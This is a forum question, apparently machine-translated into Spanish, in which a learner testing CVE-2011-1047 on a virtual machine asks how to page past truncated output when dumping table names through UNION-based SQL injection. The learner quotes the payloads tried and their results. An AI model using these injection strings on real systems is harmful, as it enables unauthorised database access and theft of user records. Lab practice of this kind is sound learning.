Esto podría parecer una pregunta noob. Actualmente estoy tratando de inyección SQL en una máquina virtual. Esto es lo que estoy tratando
union select group_concat(table_name) from information_schema.tables#
Y la inyección funciona. Pero la página que se devuelve es un archivo XML y cada etiqueta tiene un límite de tamaño, por lo que solo puedo ver la mitad de los resultados.
<title>Bla Forum - Topic: CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>
¿Hay alguna forma de imprimir la segunda mitad de los resultados? La tabla que necesito ver contiene la palabra "usuario". Si soy demasiado ambiguo, quiero hacer algo como:
- Organice las filas del resultado y luego
group_concat
it - Rebana el resultado (como en
string[10:]
) - Selecciona todas las filas después de
tables_priv
Lo que ya intenté:
union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#
No se imprime nada. Pero esta consulta funciona cuando lo pruebo directamente en la máquina virtual de MySQL (después de omitir el 'union' y el '#').
union select group_concat(table_name) from information_schema.tables where table_name like 'user'#
No funcionó en la aplicación web ni directamente en MySQL de VM.
PS. Sé que sqlmap hará el trabajo por mí, pero quiero probar las cosas manualmente.
PPS. Estoy probando CVE-2011-1047 (parámetro de tema en feed.php)